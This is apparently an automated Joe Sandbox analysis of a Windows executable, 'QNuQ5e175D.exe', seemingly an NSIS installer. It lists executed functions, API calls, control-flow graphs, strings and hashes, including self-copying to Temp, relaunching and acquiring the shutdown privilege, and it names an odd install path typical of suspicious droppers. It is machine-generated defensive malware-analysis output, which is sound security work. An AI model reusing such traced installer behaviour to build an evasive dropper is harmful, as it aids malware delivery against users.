402da9 21 API calls 5722->5723 5724 401d42 IsWindow 5723->5724 5725 401a45 5724->5725 5726 404d3d 5727 404d69 5726->5727 5728 404d4d 5726->5728 5730 404d9c 5727->5730 5731 404d6f SHGetPathFromIDListW 5727->5731 5737 405bbb GetDlgItemTextW 5728->5737 5733 404d7f 5731->5733 5736 404d86 SendMessageW 5731->5736 5732 404d5a SendMessageW 5732->5727 5734 40140b 2 API calls 5733->5734 5734->5736 5736->5730 5737->5732

                                                        Executed Functions

                                                        Function 00403552 Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464stringfilecomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 403552-4035a4 SetErrorMode GetVersionExW 1 4035a6-4035d6 GetVersionExW 0->1 2 4035de-4035e3 0->2 1->2 3 4035e5 2->3 4 4035eb-40362d 2->4 3->4 5 403640 4->5 6 40362f-403637 call 40696b 4->6 8 403645-403659 call 4068fb lstrlenA 5->8 6->5 11 403639 6->11 13 40365b-403677 call 40696b * 3 8->13 11->5 20 403688-4036ec #17 OleInitialize SHGetFileInfoW call 406577 GetCommandLineW call 406577 13->20 21 403679-40367f 13->21 28 4036f5-403709 call 405e73 CharNextW 20->28 29 4036ee-4036f0 20->29 21->20 25 403681 21->25 25->20 32 403804-40380a 28->32 29->28 33 403810 32->33 34 40370e-403714 32->34 35 403824-40383e GetTempPathW call 403521 33->35 36 403716-40371b 34->36 37 40371d-403724 34->37 47 403840-40385e GetWindowsDirectoryW lstrcatW call 403521 35->47 48 403896-4038b0 DeleteFileW call 4030a2 35->48 36->36 36->37 38 403726-40372b 37->38 39 40372c-403730 37->39 38->39 41 4037f1-403800 call 405e73 39->41 42 403736-40373c 39->42 41->32 56 403802-403803 41->56 45 403756-40378f 42->45 46 40373e-403745 42->46 53 403791-403796 45->53 54 4037ac-4037e6 45->54 51 403747-40374a 46->51 52 40374c 46->52 47->48 66 403860-403890 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403521 47->66 62 4038b6-4038bc 48->62 63 403a9d-403aad call 403b6f OleUninitialize 48->63 51->45 51->52 52->45 53->54 58 403798-4037a0 53->58 60 4037e8-4037ec 54->60 61 4037ee-4037f0 54->61 56->32 64 4037a2-4037a5 58->64 65 4037a7 58->65 60->61 67 403812-40381f call 406577 60->67 61->41 69 4038c2-4038cd call 405e73 62->69 70 403955-40395c call 403c49 62->70 77 403ad3-403ad9 63->77 78 403aaf-403abf call 405bd7 ExitProcess 63->78 64->54 64->65 65->54 66->48 66->63 67->35 82 40391b-403925 69->82 83 4038cf-403904 69->83 80 403961-403965 70->80 84 403b57-403b5f 77->84 85 403adb-403af1 GetCurrentProcess OpenProcessToken 77->85 80->63 92 403927-403935 call 405f4e 82->92 93 40396a-403990 call 405b42 lstrlenW call 406577 82->93 89 403906-40390a 83->89 86 403b61 84->86 87 403b65-403b69 ExitProcess 84->87 90 403af3-403b21 LookupPrivilegeValueW AdjustTokenPrivileges 85->90 91 403b27-403b35 call 40696b 85->91 86->87 94 403913-403917 89->94 95 40390c-403911 89->95 90->91 105 403b43-403b4e ExitWindowsEx 91->105 106 403b37-403b41 91->106 92->63 103 40393b-403951 call 406577 * 2 92->103 112 4039a1-4039b9 93->112 113 403992-40399c call 406577 93->113 94->89 99 403919 94->99 95->94 95->99 99->82 103->70 105->84 108 403b50-403b52 call 40140b 105->108 106->105 106->108 108->84 115 4039be-4039c2 112->115 113->112 118 4039c7-4039f1 wsprintfW call 4065b4 115->118 122 4039f3-4039f8 call 405acb 118->122 123 4039fa call 405b25 118->123 127 4039ff-403a01 122->127 123->127 128 403a03-403a0d GetFileAttributesW 127->128 129 403a3d-403a5c SetCurrentDirectoryW call 406337 CopyFileW 127->129 131 403a2e-403a39 128->131 132 403a0f-403a18 DeleteFileW 128->132 136 403a9b 129->136 137 403a5e-403a7f call 406337 call 4065b4 call 405b5a 129->137 131->115 133 403a3b 131->133 132->131 135 403a1a-403a2c call 405c83 132->135 133->63 135->118 135->131 136->63 146 403a81-403a8b 137->146 147 403ac5-403ad1 CloseHandle 137->147 146->136 148 403a8d-403a95 call 4068d4 146->148 147->136 148->118 148->136
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 00403575
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004035A0
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004035B3
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040364C
                                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403689
                                                        • OleInitialize.OLE32(00000000), ref: 00403690
                                                        • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 004036AF
                                                        • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036C4
                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000020,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036FD
                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403835
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403852
                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403866
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040386E
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387F
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403887
                                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040389B
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403974
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                        • wsprintfW.USER32 ref: 004039D1
                                                        • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 00403A04
                                                        • DeleteFileW.KERNEL32(00437800), ref: 00403A10
                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A3E
                                                          • Part of subcall function 00406337: MoveFileExW.KERNEL32(?,?,00000005,00405E35,?,00000000,000000F1,?,?,?,?,?), ref: 00406341
                                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\QNuQ5e175D.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A54
                                                          • Part of subcall function 00405B5A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                          • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                          • Part of subcall function 004068D4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                          • Part of subcall function 004068D4: FindClose.KERNELBASE(00000000), ref: 004068EB
                                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AA2
                                                        • ExitProcess.KERNEL32 ref: 00403ABF
                                                        • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AC6
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AE2
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AE9
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AFE
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B21
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B46
                                                        • ExitProcess.KERNEL32 ref: 00403B69
                                                          • Part of subcall function 00405B25: CreateDirectoryW.KERNELBASE(?,00000000,00403545,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres$C:\Users\user\Desktop$C:\Users\user\Desktop\QNuQ5e175D.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                        • API String ID: 1813718867-3260677286
                                                        • Opcode ID: 3bbf329214e6d57898fd1087eec31c3cd4d4deec240645a0aaa836412135d51f
                                                        • Instruction ID: 854c728f01c0035939758d15b123b9002cb8995d15bf2fdbd915a0a46deb4321
                                                        • Opcode Fuzzy Hash: 3bbf329214e6d57898fd1087eec31c3cd4d4deec240645a0aaa836412135d51f
                                                        • Instruction Fuzzy Hash: 6DF1F470604301ABD320AF659D05B6B7EE8EB8570AF10483FF581B22D1DB7DDA458B6E
                                                        Function 0040573B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 151 40573b-405756 152 4058e5-4058ec 151->152 153 40575c-405823 GetDlgItem * 3 call 40452b call 404e84 GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 405916-405923 152->155 156 4058ee-405910 GetDlgItem CreateThread CloseHandle 152->156 175 405841-405844 153->175 176 405825-40583f SendMessageW * 2 153->176 158 405941-40594b 155->158 159 405925-40592b 155->159 156->155 160 4059a1-4059a5 158->160 161 40594d-405953 158->161 163 405966-40596f call 40455d 159->163 164 40592d-40593c ShowWindow * 2 call 40452b 159->164 160->163 169 4059a7-4059ad 160->169 165 405955-405961 call 4044cf 161->165 166 40597b-40598b ShowWindow 161->166 172 405974-405978 163->172 164->158 165->163 173 40599b-40599c call 4044cf 166->173 174 40598d-405996 call 4055fc 166->174 169->163 177 4059af-4059c2 SendMessageW 169->177 173->160 174->173 180 405854-40586b call 4044f6 175->180 181 405846-405852 SendMessageW 175->181 176->175 182 405ac4-405ac6 177->182 183 4059c8-4059f3 CreatePopupMenu call 4065b4 AppendMenuW 177->183 190 4058a1-4058c2 GetDlgItem SendMessageW 180->190 191 40586d-405881 ShowWindow 180->191 181->180 182->172 188 4059f5-405a05 GetWindowRect 183->188 189 405a08-405a1d TrackPopupMenu 183->189 188->189 189->182 192 405a23-405a3a 189->192 190->182 195 4058c8-4058e0 SendMessageW * 2 190->195 193 405890 191->193 194 405883-40588e ShowWindow 191->194 196 405a3f-405a5a SendMessageW 192->196 197 405896-40589c call 40452b 193->197 194->197 195->182 196->196 198 405a5c-405a7f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->190 200 405a81-405aa8 SendMessageW 198->200 200->200 201 405aaa-405abe GlobalUnlock SetClipboardData CloseClipboard 200->201 201->182
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405799
                                                        • GetDlgItem.USER32(?,000003EE), ref: 004057A8
                                                        • GetClientRect.USER32(?,?), ref: 004057E5
                                                        • GetSystemMetrics.USER32(00000002), ref: 004057EC
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040580D
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040581E
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405831
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040583F
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405852
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405874
                                                        • ShowWindow.USER32(?,00000008), ref: 00405888
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058A9
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004058B9
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058D2
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058DE
                                                        • GetDlgItem.USER32(?,000003F8), ref: 004057B7
                                                          • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058FB
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000056CF,00000000), ref: 00405909
                                                        • CloseHandle.KERNELBASE(00000000), ref: 00405910
                                                        • ShowWindow.USER32(00000000), ref: 00405934
                                                        • ShowWindow.USER32(?,00000008), ref: 00405939
                                                        • ShowWindow.USER32(00000008), ref: 00405983
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004059B7
                                                        • CreatePopupMenu.USER32 ref: 004059C8
                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059DC
                                                        • GetWindowRect.USER32(?,?), ref: 004059FC
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405A15
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4D
                                                        • OpenClipboard.USER32(00000000), ref: 00405A5D
                                                        • EmptyClipboard.USER32 ref: 00405A63
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A6F
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405A79
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A8D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405AAD
                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405AB8
                                                        • CloseClipboard.USER32 ref: 00405ABE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: {
                                                        • API String ID: 590372296-366298937
                                                        • Opcode ID: d983cdf5f34f6151cad2321293c356f45f3306b1bb5ea95040b854dda8cdae6d
                                                        • Instruction ID: d3b07f9c2581fb6b60ef1a2666babd9f8dcdaaa8066b0d43d813b8afd8e95190
                                                        • Opcode Fuzzy Hash: d983cdf5f34f6151cad2321293c356f45f3306b1bb5ea95040b854dda8cdae6d
                                                        • Instruction Fuzzy Hash: 03B159B0900608FFDF11AF60DD89AAE7B79FB48355F00813AFA45BA1A0C7785A51DF58
                                                        Function 73B01BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 73B012BB: GlobalAlloc.KERNELBASE(00000040,?,73B012DB,?,73B0137F,00000019,73B011CA,-000000A0), ref: 73B012C5
                                                        • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73B01D2D
                                                        • lstrcpyW.KERNEL32(00000008,?), ref: 73B01D75
                                                        • lstrcpyW.KERNEL32(00000808,?), ref: 73B01D7F
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B01D92
                                                        • GlobalFree.KERNEL32(?), ref: 73B01E74
                                                        • GlobalFree.KERNEL32(?), ref: 73B01E79
                                                        • GlobalFree.KERNEL32(?), ref: 73B01E7E
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B02068
                                                        • lstrcpyW.KERNEL32(?,?), ref: 73B02222
                                                        • GetModuleHandleW.KERNEL32(00000008), ref: 73B022A1
                                                        • LoadLibraryW.KERNEL32(00000008), ref: 73B022B2
                                                        • GetProcAddress.KERNEL32(?,?), ref: 73B0230C
                                                        • lstrlenW.KERNEL32(00000808), ref: 73B02326
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                        • String ID:
                                                        • API String ID: 245916457-0
                                                        • Opcode ID: 7cef922caf06c6b257d58d4287bd4bd3cdc204bf10a2e443eb041c38675be0bd
                                                        • Instruction ID: 8165f896b8f191b5a644070e0182c35c6352e0f0100f640a89baf4457fd625bd
                                                        • Opcode Fuzzy Hash: 7cef922caf06c6b257d58d4287bd4bd3cdc204bf10a2e443eb041c38675be0bd
                                                        • Instruction Fuzzy Hash: C4228A79D0020ADFEB19CFA4C5807AEBFB5FB88315F14853ED166AA290F7709685CB50
                                                        Function 00405C83 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 671 405c83-405ca9 call 405f4e 674 405cc2-405cc9 671->674 675 405cab-405cbd DeleteFileW 671->675 677 405ccb-405ccd 674->677 678 405cdc-405cec call 406577 674->678 676 405e3f-405e43 675->676 679 405cd3-405cd6 677->679 680 405ded-405df2 677->680 684 405cfb-405cfc call 405e92 678->684 685 405cee-405cf9 lstrcatW 678->685 679->678 679->680 680->676 683 405df4-405df7 680->683 686 405e01-405e09 call 4068d4 683->686 687 405df9-405dff 683->687 688 405d01-405d05 684->688 685->688 686->676 695 405e0b-405e1f call 405e46 call 405c3b 686->695 687->676 691 405d11-405d17 lstrcatW 688->691 692 405d07-405d0f 688->692 694 405d1c-405d38 lstrlenW FindFirstFileW 691->694 692->691 692->694 696 405de2-405de6 694->696 697 405d3e-405d46 694->697 711 405e21-405e24 695->711 712 405e37-405e3a call 4055fc 695->712 696->680 700 405de8 696->700 701 405d66-405d7a call 406577 697->701 702 405d48-405d50 697->702 700->680 713 405d91-405d9c call 405c3b 701->713 714 405d7c-405d84 701->714 705 405d52-405d5a 702->705 706 405dc5-405dd5 FindNextFileW 702->706 705->701 707 405d5c-405d64 705->707 706->697 710 405ddb-405ddc FindClose 706->710 707->701 707->706 710->696 711->687 715 405e26-405e35 call 4055fc call 406337 711->715 712->676 724 405dbd-405dc0 call 4055fc 713->724 725 405d9e-405da1 713->725 714->706 716 405d86-405d8f call 405c83 714->716 715->676 716->706 724->706 728 405da3-405db3 call 4055fc call 406337 725->728 729 405db5-405dbb 725->729 728->706 729->706
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405CAC
                                                        • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405CF4
                                                        • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D17
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D1D
                                                        • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405D2D
                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DCD
                                                        • FindClose.KERNEL32(00000000), ref: 00405DDC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                                        • API String ID: 2035342205-770147174
                                                        • Opcode ID: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                                        • Instruction ID: 26a84cf893ecfac7fe2d2a8ab9ced37764d13583991ceadb599b2dfedf858990
                                                        • Opcode Fuzzy Hash: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                                        • Instruction Fuzzy Hash: 8E41B030800A18B6CB21AB65DC4DAAF7778EF42718F10813BF851711D1DB7C4A82DEAE
                                                        Function 004068D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00405F97,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\), ref: 004068DF
                                                        • FindClose.KERNELBASE(00000000), ref: 004068EB
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\nsj924C.tmp, xrefs: 004068D4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsj924C.tmp
                                                        • API String ID: 2295610775-1453126546
                                                        • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                        • Instruction ID: 1cf04926a4a3889f6b92b588199f87985a57aa1d1812818edfb9113e4ef6e03f
                                                        • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                                        • Instruction Fuzzy Hash: 53D012725162209BC240673CBD0C84B7A58AF253317518A3AF46AF61E0DB348C639699
                                                        Function 00403FF7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
